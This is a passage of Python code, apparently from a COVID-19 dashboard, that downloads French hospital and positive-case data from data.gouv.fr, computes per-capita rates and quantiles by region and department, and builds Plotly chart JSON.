df\n dprate = pd.read_csv(CovidFr.synthesis_dprate_url, sep=';', dtype={'dep': \"string\"}, usecols=['dep', 'jour', 'P', 'cl_age90']).dropna()\n dprate['jour'] = pd.to_datetime(dprate['jour'])\n dprate = dprate.drop_duplicates()\n self.dprate = dprate.loc[dprate['dep'].isin(list(self.department_base_data.index))]\n\n #other parameters\n self.positive_last_day = self.dprate.jour.max().strftime(\"%Y-%m-%d\")\n self.positive_last_day_fr = self.dprate.jour.max().strftime(\"%d/%m/%Y\")\n \n ###############################\n # required process settings\n ###############################\n self.map_choice = [\"Nombre de guérisons\", \"Nombre de décès\", \"Taux décès / (décès + guérisons)\", \"Nombre d'hospitalisations le \"+self.last_day_fr, \"Nombre de réanimations le \"+self.last_day_fr, \"Nombre de cas positifs le \"+self.positive_last_day_fr]\n self.criterion_choice = [\"Cas positifs au \"+self.positive_last_day_fr, \"Hospitalisations au \"+self.last_day_fr, \"Réanimations au \"+self.last_day_fr]\n self.default_map_select = self.map_choice[5]\n self.default_criterion_select = self.criterion_choice[0]\n\n return self.nprate, self.rprate, self.dprate\n\n def covid_need_update(self):\n \"\"\"Check the last update of the datasets on data.gouv.fr and tells whether we need to refresh the data or not\n Returns:\n True if the data need to be updated, False instead\n \"\"\"\n with urllib.request.urlopen(\"https://www.data.gouv.fr/datasets/5e7e104ace2080d9162b61d8/rdf.json\") as url:\n data = json.loads(url.read().decode())\n #data = json.loads(data)\n for dataset in data['@graph']:\n if 'accessURL' in dataset.keys() and dataset['accessURL'] == CovidFr.synthesis_covid_url:\n if self.last_update == \"\" or self.last_update < dataset['modified']:\n return True\n return False\n\n def positive_need_update(self):\n \"\"\"Check the last update of the datasets on data.gouv.fr and tells whether we need to refresh the data or not\n Returns:\n True if the data need to be updated, False instead\n \"\"\"\n with urllib.request.urlopen(\"https://www.data.gouv.fr/datasets/5ed1175ca00bbe1e4941a46a/rdf.json\") as url:\n data = json.loads(url.read().decode())\n #data = json.loads(data)\n for dataset in data['@graph']:\n if 'accessURL' in dataset.keys() and dataset['accessURL'] == CovidFr.synthesis_dprate_url:\n if self.positive_last_update == \"\" or self.positive_last_update < dataset['modified']:\n return True\n return False\n\n def map_covid_reg(self, data=None):\n \"\"\"\n Get data from regions as a JSON string along with quantiles\n Returns:\n JSON string of regions overall data\n \"\"\"\n if data is None:\n reg_data = self.covid[(self.covid['sexe'] == 0)]\n else:\n reg_data = data[(data['sexe'] == 0)]\n\n nat_data = reg_data.copy()\n nat_data = nat_data.groupby(\"jour\").sum()\n\n reg_data = reg_data \\\n .drop(['jour', 'sexe'], axis=1) \\\n .groupby(['reg','dep']) \\\n .max() \\\n .groupby('reg') \\\n .sum()\n\n reg_data = pd.concat([reg_data, self.region_base_data], axis=1)\n\n overall_reg_data_as_json_dict = {}\n\n features = self.features.copy()\n features.append(\"r_dc_rad\")\n for feature in features: \n if feature == \"dc\" or feature == \"rad\":\n ### For death and or rad case maps\n reg_data[feature+'_par_habitants'] = (reg_data[feature] / reg_data['population']) * 100000\n\n data_feature = reg_data.copy()\n \n data_feature = data_feature.set_index(\"region-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() \\\n <= ((nat_data.at[self.last_day, feature] / self.region_base_data[\"population\"].sum()) * 100000))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n \n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_regions_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_reg_data_as_json_dict.update({'overall_regions_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n \n elif feature == \"r_dc_rad\":\n ### For rate death case map\n reg_data[feature] = (reg_data['dc'] / (reg_data['dc'] + reg_data['rad']))\n \n data_feature = reg_data.copy()\n\n data_feature = data_feature.set_index(\"region-\" + data_feature.index)\n\n data_feature = data_feature.loc[:, ['label', 'dc', 'rad', feature, 'insee']]\n\n q_feature = np.mean(reg_data[feature].to_numpy() <= (data_feature['dc'].sum() / (data_feature['dc'].sum() + data_feature['rad'].sum())))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+2*(.979-q_feature)/3, .979]\n\n quantiles_feature = data_feature[feature] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature] = data_feature[feature].round(2)\n\n #setattr(self, 'overall_regions_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_reg_data_as_json_dict.update({'overall_regions_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n elif feature == \"hosp\" or feature == \"rea\":\n ### For hosp and or rea case map\n reg_data_j = self.covid[(self.covid['sexe'] == 0) & (self.covid['jour'] == self.last_day)]\n \n reg_data_j = reg_data_j \\\n .drop(['dep', 'jour', 'sexe'], axis=1) \\\n .groupby('reg') \\\n .sum()\n\n reg_data_j = pd.concat([reg_data_j, self.region_base_data], axis=1)\n\n reg_data_j[feature+'_par_habitants'] = (reg_data_j[feature] / reg_data_j['population']) * 100000\n \n data_feature = reg_data_j.copy()\n \n data_feature = data_feature.set_index(\"region-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() \\\n <= ((nat_data.at[self.last_day, feature] / self.region_base_data[\"population\"].sum()) * 100000))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n\n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_regions_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_reg_data_as_json_dict.update({'overall_regions_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n return overall_reg_data_as_json_dict\n\n def map_covid_dep(self, data=None):\n \"\"\"\n Get data from departments as a JSON string along with quantiles\n Returns:\n JSON string of departments overall data\n \"\"\"\n if data is None:\n dep_data = self.covid[(self.covid['sexe'] == 0)]\n else:\n dep_data = data[(data['sexe'] == 0)]\n\n nat_data = dep_data.copy()\n nat_data = nat_data.groupby(\"jour\").sum()\n\n dep_data = dep_data \\\n .drop(['reg', 'jour', 'sexe'], axis=1) \\\n .groupby('dep') \\\n .max()\n\n dep_data = pd.concat([dep_data, self.department_base_data], axis=1)\n\n overall_dep_data_as_json_dict = {}\n\n features = self.features.copy()\n features.append(\"r_dc_rad\")\n for feature in features: \n if feature == \"dc\" or feature == \"rad\":\n ### For death and or rad case maps\n dep_data[feature+'_par_habitants'] = (dep_data[feature] / dep_data['population']) * 100000\n\n data_feature = dep_data.copy()\n \n data_feature = data_feature.set_index(\"department-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() \\\n <= ((nat_data.at[self.last_day, feature] / self.department_base_data[\"population\"].sum()) * 100000))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n \n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_departments_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_dep_data_as_json_dict.update({'overall_departments_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n \n elif feature == \"r_dc_rad\":\n ### For rate death case map\n dep_data[feature] = (dep_data['dc'] / (dep_data['dc'] + dep_data['rad']))\n \n data_feature = dep_data.copy()\n\n data_feature = data_feature.set_index(\"department-\" + data_feature.index)\n\n data_feature = data_feature.loc[:, ['label', 'dc', 'rad', feature, 'insee']]\n\n q_feature = np.mean(dep_data[feature].to_numpy() <= (data_feature['dc'].sum() / (data_feature['dc'].sum() + data_feature['rad'].sum())))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+2*(.979-q_feature)/3, .979]\n\n quantiles_feature = data_feature[feature] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature] = data_feature[feature].round(2)\n\n #setattr(self, 'overall_departments_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_dep_data_as_json_dict.update({'overall_departments_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n elif feature == \"hosp\" or feature == \"rea\":\n ### For hosp and or rea case map\n dep_data_j = self.covid[(self.covid['sexe'] == 0) & (self.covid['jour'] == self.last_day)]\n dep_data_j = dep_data_j \\\n .drop(['reg', 'jour', 'sexe'], axis=1) \\\n .groupby('dep') \\\n .max()\n dep_data_j = pd.concat([dep_data_j, self.department_base_data], axis=1)\n\n dep_data_j[feature+'_par_habitants'] = (dep_data_j[feature] / dep_data_j['population']) * 100000\n \n data_feature = dep_data_j.copy()\n \n data_feature = data_feature.set_index(\"department-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() \\\n <= ((nat_data.at[self.last_day, feature] / self.department_base_data[\"population\"].sum()) * 100000))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n\n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_departments_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_dep_data_as_json_dict.update({'overall_departments_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n return overall_dep_data_as_json_dict\n\n def charts_impacted_dep(self, top_number=None): \n if top_number is None:\n top_number = self.default_top_dep\n ratedf = self.covid[(self.covid.sexe == 0) & (self.covid.jour == self.last_day)].groupby(['dep']).sum().copy()\n ratedf = ratedf.drop(['sexe',], axis=1)\n ratedf = (ratedf[['hosp', 'rea', 'rad', 'dc']].div(self.department_base_data['population'], axis=0) * 100000).round(2)\n ratedf = pd.concat([ratedf, self.department_base_data], axis=1)\n ratedf.sort_values(by=['hosp'], inplace=True, ascending=False)\n\n dep_data_norm = {department: ((self.covid[(self.covid.dep == department) & (self.covid.sexe == 0)].groupby(['jour']).sum() / self.department_base_data.at[department, 'population']) * 100000).round(2) for department in self.department_base_data.insee}\n dep_data_norm_col = CovidFr.normrate(ddn=dep_data_norm, cdu=list(self.covid.dep.unique()), featurelist = ['hosp', 'rea', 'rad', 'dc'])\n\n tddv_hosp = CovidFr.topdepdataviz(data=dep_data_norm_col[\"hosp\"], top=True, top_number=top_number, threshold=65)\n tddv_rea = CovidFr.topdepdataviz(data=dep_data_norm_col[\"rea\"], top=True, top_number=top_number, threshold=65)\n\n # start of integration of the positive cases\n pratedf = self.dprate[(self.dprate.cl_age90 == 0) & (self.dprate.jour == self.positive_last_day)].groupby(['dep']).sum().copy()\n pratedf = pratedf.drop(['cl_age90'], axis=1)\n pratedf = (pratedf[['P']].div(self.department_base_data['population'], axis=0) * 100000).round(2)\n pratedf = pd.concat([pratedf, self.department_base_data], axis=1)\n\n dep_positive_norm = {department: ((self.dprate[(self.dprate.dep == department) & (self.dprate.cl_age90 == 0)].groupby(['jour']).sum() / self.department_base_data.at[department, 'population']) * 100000).round(2) for department in self.department_base_data.insee}\n dep_positive_norm_col = CovidFr.normrate(ddn=dep_positive_norm, cdu=list(self.dprate.dep.unique()), featurelist = ['P'])\n\n tddv_positive = CovidFr.topdepdataviz(data=dep_positive_norm_col[\"P\"], top=True, top_number=top_number, threshold=65)\n # end integration of the positive cases\n\n graphs = [\n dict(\n id = \"Dernier nombre de patients pour 100 000 habitants par département\",\n data = [\n CovidFr.dataviz(x=ratedf.label, y=ratedf['hosp'], curve_type='bar', color='#ff7f00', width=1.5, name=\"Nbre d'hospitalisations\", opacity=0.9, text = [i for i in ratedf.index], hovertemplate = '%{y:.2f} hospitalisations
dépt. %{x} (FR-%{text})'), \n\n CovidFr.dataviz(x=ratedf.label, y=ratedf['dc'], curve_type='bar', color='#730800', width=1.5, name=\"Nbre de décès\", opacity=0.9, text = [i for i in ratedf.index], hovertemplate = '%{y:.2f} décès
dépt. %{x} (FR-%{text})'), \n\n CovidFr.dataviz(x=ratedf.label, y=ratedf['rea'], curve_type='bar', color='#ff0000', width=1.5, name=\"Nbre de réanimations\", opacity=0.9, text = [i for i in ratedf.index], hovertemplate = '%{y:.2f} réanimations
dépt. %{x} (FR-%{text})'),\n\n CovidFr.dataviz(x=pratedf.label, y=pratedf['P'], curve_type='bar', color='#f84ed3', width=1.5, name=\"Nbre de cas positifs\", opacity=0.9, text = [i for i in pratedf.index], hovertemplate = '%{y:.2f} cas positifs
dépt. %{x} (FR-%{text})'),\n ],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=10, b=30, t=30), barmode='group', linemode='overlay', legend_orientation=\"h\"),\n ),\n\n dict(\n id = \"Top des départements selon le nombre d'hospitalisations pour 100 000 habitants\",\n data = [CovidFr.dataviz(x=tddv_hosp.index, y=tddv_hosp[dep], curve_type='Scatter', name=self.department_base_data.at[dep, \"label\"], text=[self.department_base_data.at[dep, \"label\"]+\" (FR-\"+dep+\")\"]*len(tddv_hosp.index), hovertemplate='%{y:.2f} '+'hospitalisations'+'
'+'dépt. %{text}') for dep in list(tddv_hosp.columns.unique())],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=10, b=30, t=30), linemode='overlay', legend_orientation=\"h\"),\n ),\n\n dict(\n id = \"Top des départements selon le nombre de réanimations pour 100 000 habitants\",\n data = [CovidFr.dataviz(x=tddv_rea.index, y=tddv_rea[dep], curve_type='Scatter', name=self.department_base_data.at[dep, \"label\"], text=[self.department_base_data.at[dep, \"label\"]+\" (FR-\"+dep+\")\"]*len(tddv_rea.index), hovertemplate='%{y:.2f} '+'réanimations'+'
'+'dépt. %{text}') for dep in list(tddv_rea.columns.unique())],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=10, b=30, t=30), linemode='overlay', legend_orientation=\"h\"),\n ),\n\n dict(\n id = \"Top des départements selon le nombre de cas positifs pour 100 000 habitants\",\n data = [CovidFr.dataviz(x=tddv_positive.index, y=tddv_positive[dep], curve_type='Scatter', name=self.department_base_data.at[dep, \"label\"], text=[self.department_base_data.at[dep, \"label\"]+\" (FR-\"+dep+\")\"]*len(tddv_positive.index), hovertemplate='%{y:.2f} '+'cas positifs'+'
'+'dépt. %{text}') for dep in list(tddv_positive.columns.unique())],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=10, b=30, t=30), linemode='overlay', legend_orientation=\"h\"),\n ),\n ]\n #############################################################\n gJ = {}\n for g in range(len(graphs)):\n gJ.update({'graphJSON{}'.format(g): json.dumps([graphs[g]], cls=plotly.utils.PlotlyJSONEncoder)})\n #############################################################\n return gJ\n\n def charts_and_parameters_covid_data(self, data=None, department=None, region=None): \n if region is None and department is None:\n if data is None:\n cdata = self.covid[self.covid.sexe == 0].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.department_base_data[\"population\"].sum()\n else: \n cdata = data[data.sexe == 0].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.department_base_data[\"population\"].sum()\n elif region is None and not department is None:\n if data is None:\n cdata = self.covid[(self.covid.dep == department) & (self.covid.sexe == 0)].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.department_base_data.at[department, 'population']\n else: \n cdata = data[(data.dep == department) & (data.sexe == 0)].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.department_base_data.at[department, 'population']\n elif not region is None and department is None:\n if data is None:\n # regdep = []\n # for d in self.covid[self.covid.reg==region].dep.unique():\n # regdep.append(CovidFr.dailycases(data=self.covid[(self.covid.dep == d) & (self.covid.sexe == 0)].groupby(['jour']).sum(), pca=False))\n # cdata = reduce(lambda x, y: x.add(y, fill_value=0), regdep)\n cdata = self.covid[(self.covid.reg == region) & (self.covid.sexe == 0)].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.region_base_data.at[region, 'population']\n else: \n # regdep = []\n # for d in data[data.reg==region].dep.unique():\n # regdep.append(CovidFr.dailycases(data=data[(data.dep == d) & (data.sexe == 0)].groupby(['jour']).sum(), pca=False))\n # cdata = reduce(lambda x, y: x.add(y, fill_value=0), regdep)\n cdata = data[(data.reg == region) & (data.sexe == 0)].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.region_base_data.at[region, 'population']\n\n graphs = [\n dict(\n id = \"Nombre de personnes actuellement hospitalisées\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['hosp'], curve_type='line', color='#ff7f00', width=3)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30)),\n ), \n\n dict(\n id = \"Nombre de personnes actuellement en réanimation\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['rea'], curve_type='line', color='#ff0000', width=3)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30)),\n ), \n\n dict(\n id = \"Nombre cumulé de personnes décédées à l'hôpital\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['dc_rectif'], curve_type='line', color='#730800', width=3)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30)),\n ),\n\n dict(\n id = \"Nombre cumulé de personnes retournées à domicile\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['rad_rectif'], curve_type='line', color='#57d53b', width=3)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30)),\n ),\n\n dict(\n id = \"Nombre quotidien de personnes décédées à l'hôpital\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['dc_j'], curve_type='bar', color='#730800', width=1)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=15, b=30, t=30), barmode='overlay',linemode='overlay', legend_orientation=\"h\"),\n ),\n\n dict(\n id = \"Nombre quotidien de personnes retournées à domicile\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['rad_j'], curve_type='bar', color='#57d53b', width=1, opacity=0.8)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=15, b=30, t=30), barmode='overlay',linemode='overlay', legend_orientation=\"h\"),\n ),\n ]\n #############################################################\n gJ = {}\n for g in range(len(graphs)):\n gJ.update({'graphJSON{}'.format(g): json.dumps([graphs[g]], cls=plotly.utils.PlotlyJSONEncoder)})\n #############################################################\n\n fdata = self.covid[self.covid.sexe == 0].groupby(['jour']).sum().copy()\n popfr = self.department_base_data[\"population\"].sum()\n\n before_last_day = cdata.index[-2].strftime(\"%Y-%m-%d\")\n\n counters = {\n \"last_update_fr\": datetime.strptime(self.last_update, \"%Y-%m-%dT%H:%M:%S.%f\").strftime(\"%d/%m/%Y à %Hh%M\"),\n \n \"last_dc\": cdata.at[self.last_day, 'dc_j'],\n \"diff_dc\": cdata.at[self.last_day, 'dc_j'] - cdata.at[before_last_day, 'dc_j'],\n \"all_dc\": cdata.at[self.last_day, 'dc_rectif'],\n \"last_rad\": cdata.at[self.last_day, 'rad_j'],\n \"diff_rad\": cdata.at[self.last_day, 'rad_j'] - cdata.at[before_last_day, 'rad_j'],\n \"all_rad\": cdata.at[self.last_day, 'rad_rectif'], \n \"current_hosp\": cdata.at[self.last_day, 'hosp'],\n \"diff_hosp\": cdata.at[self.last_day, 'hosp'] - cdata.at[before_last_day, 'hosp'],\n \"current_rea\": cdata.at[self.last_day, 'rea'], \n \"diff_rea\": cdata.at[self.last_day, 'rea'] - cdata.at[before_last_day, 'rea'],\n\n \"rates\": {\n \"dc\": ((cdata.at[self.last_day, 'dc_rectif'] / cpop) * 100000).round(2),\n \"d_dc\": (((cdata.at[self.last_day, 'dc_rectif'] - cdata.at[before_last_day, 'dc_rectif']) / cpop) * 100000).round(2),\n \"rea\": ((cdata.at[self.last_day, 'rea'] / cpop) * 100000).round(2),\n \"d_rea\": (((cdata.at[self.last_day, 'rea'] - cdata.at[before_last_day, 'rea']) / cpop) * 100000).round(2),\n \"hosp\": ((cdata.at[self.last_day, 'hosp'] / cpop) * 100000).round(2),\n \"d_hosp\": (((cdata.at[self.last_day, 'hosp'] - cdata.at[before_last_day, 'hosp']) / cpop) * 100000).round(2),\n \"rad\": ((cdata.at[self.last_day, 'rad_rectif'] / cpop) * 100000).round(2),\n \"d_rad\": (((cdata.at[self.last_day, 'rad_rectif'] - cdata.at[before_last_day, 'rad_rectif']) / cpop) * 100000).round(2),\n \"r_dc_rad\": ((cdata.at[self.last_day, 'dc_rectif'] / (cdata.at[self.last_day, 'dc_rectif'] + cdata.at[self.last_day, 'rad_rectif']))*100).round(2),\n \"d_r_dc_rad\": ((cdata.at[self.last_day, 'dc_rectif'] / (cdata.at[self.last_day, 'dc_rectif'] + cdata.at[self.last_day, 'rad_rectif']))*100 - (cdata.at[before_last_day, 'dc_rectif'] / (cdata.at[before_last_day, 'dc_rectif'] + cdata.at[before_last_day, 'rad_rectif']))*100).round(2),\n },\n \n \"nat_refs\": {\n \"nat_dc\": ((fdata.at[self.last_day, 'dc'] / popfr) * 100000).round(2),\n \"nat_r_dc_rad\": (fdata.at[self.last_day, 'dc'] / (fdata.at[self.last_day, 'dc'] + fdata.at[self.last_day, 'rad'])).round(2),\n \"nat_rad\": ((fdata.at[self.last_day, 'rad'] / popfr) * 100000).round(2),\n \"nat_hosp\": ((fdata.at[self.last_day, 'hosp'] / popfr) * 100000).round(2),\n \"nat_rea\": ((fdata.at[self.last_day, 'rea'] / popfr) * 100000).round(2),\n },\n }\n gJ.update({'counters': counters})\n\n return gJ\n\n ##############################\n # positive case study starting\n ##############################\n def map_positive_reg(self, data=None):\n \"\"\"\n Get data from regions as a JSON string along with quantiles\n Returns:\n JSON string of regions overall data\n \"\"\" \n if data is None:\n reg_data = self.rprate[(self.rprate['cl_age90'] == 0)].copy()\n else:\n reg_data = data[(data['cl_age90'] == 0)]\n\n overall_reg_data_as_json_dict = {}\n\n for feature in [\"P\"]: \n ### For positive case map\n reg_data_j = self.rprate[(self.rprate['cl_age90'] == 0) & (self.rprate['jour'] == self.positive_last_day)]\n reg_data_j = reg_data_j.drop([\"jour\", \"cl_age90\"], axis=1).groupby('reg').max()\n reg_data_j = pd.concat([reg_data_j, self.region_base_data], axis=1)\n\n reg_data_j[feature+'_par_habitants'] = (reg_data_j[feature] / reg_data_j['population']) * 100000\n \n data_feature = reg_data_j.copy()\n \n data_feature = data_feature.set_index(\"region-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n nat = (reg_data.groupby(\"jour\").sum().at[self.positive_last_day, feature] / self.region_base_data[\"population\"].sum()) * 100000\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() <= nat)\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n\n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_regions_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_reg_data_as_json_dict.update({'overall_regions_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n return overall_reg_data_as_json_dict\n\n def map_positive_dep(self, data=None):\n \"\"\"\n Get data from regions as a JSON string along with quantiles\n Returns:\n JSON string of departments overall data\n \"\"\" \n if data is None:\n dep_data = self.dprate[(self.dprate['cl_age90'] == 0)].copy()\n else:\n dep_data = data[(data['cl_age90'] == 0)]\n\n overall_dep_data_as_json_dict = {}\n\n for feature in [\"P\"]: \n ### For positive case map\n dep_data_j = self.dprate[(self.dprate['cl_age90'] == 0) & (self.dprate['jour'] == self.positive_last_day)]\n dep_data_j = dep_data_j.drop([\"jour\", \"cl_age90\"], axis=1).groupby('dep').max()\n dep_data_j = pd.concat([dep_data_j, self.department_base_data], axis=1)\n\n dep_data_j[feature+'_par_habitants'] = (dep_data_j[feature] / dep_data_j['population']) * 100000\n \n data_feature = dep_data_j.copy()\n \n data_feature = data_feature.set_index(\"department-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n nat = (dep_data.groupby(\"jour\").sum().at[self.positive_last_day, feature] / self.department_base_data[\"population\"].sum()) * 100000\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() <= nat)\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n\n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_departments_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_dep_data_as_json_dict.update({'overall_departments_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n return overall_dep_data_as_json_dict\n\n def charts_and_parameters_positive_data(self, data=None, department=None, region=None): \n if region is None and department is None:\n if data is None:\n cdata = self.nprate[self.nprate.cl_age90 == 0].groupby(['jour']).sum().copy()\n cpop = self.department_base_data[\"population\"].sum()\n else: \n cdata = data[data.cl_age90 == 0].groupby(['jour']).sum().copy()\n cpop = self.department_base_data[\"population\"].sum()\n elif region is None and not department is None:\n if data is None:\n cdata = self.dprate[(self.dprate.dep == department) & (self.dprate.cl_age90 == 0)].groupby(['jour']).sum().copy()\n cpop = self.department_base_data.at[department, 'population']\n else: \n cdata = data[(data.dep == department) & (data.cl_age90 == 0)].groupby(['jour']).sum().copy()\n cpop = self.department_base_data.at[department, 'population']\n elif not region is None and department is None:\n if data is None:\n cdata = self.rprate[(self.rprate.reg == region) & (self.rprate.cl_age90 == 0)].groupby(['jour']).sum().copy()\n cpop = self.region_base_data.at[region, 'population']\n else: \n cdata = data[(data.reg == region) & (data.cl_age90 == 0)].groupby(['jour']).sum().copy()\n cpop = self.region_base_data.at[region, 'population']\n\n graphs = [\n dict(\n id = \"Nombre de personnes actuellement positives\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['P'], curve_type='bar', color='#f84ed3', width=1, opacity=0.8)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=15, b=30, t=30), barmode='overlay',linemode='overlay', legend_orientation=\"h\"),\n ), \n ]\n #############################################################\n gJ = {}\n for g in range(len(graphs)):\n gJ.update({'graphJSON{}'.format(g): json.dumps([graphs[g]], cls=plotly.utils.PlotlyJSONEncoder)})\n #############################################################\n\n fdata = self.nprate[self.nprate.cl_age90 == 0].groupby(['jour']).sum().copy()\n popfr = self.department_base_data[\"population\"].sum()\n\n before_last_day = cdata.index[-2].strftime(\"%Y-%m-%d\")\n\n counters = {\n \"positive_last_day_fr\": self.positive_last_day_fr,\n \"positive_last_update_fr\": datetime.strptime(self.positive_last_update, \"%Y-%m-%dT%H:%M:%S.%f\").strftime(\"%d/%m/%Y à %Hh%M\"),\n \n \"current_positive\": cdata.at[self.positive_last_day, 'P'],\n \"diff_positive\": cdata.at[self.positive_last_day, 'P'] - cdata.at[before_last_day, 'P'],\n\n \"rates\": {\n \"positive\": ((cdata.at[self.positive_last_day, 'P'] / cpop) * 100000).round(2),\n \"d_positive\": (((cdata.at[self.positive_last_day, 'P'] - cdata.at[before_last_day, 'P']) / cpop) * 100000).round(2),\n },\n \n \"nat_refs\": {\n \"nat_positive\": 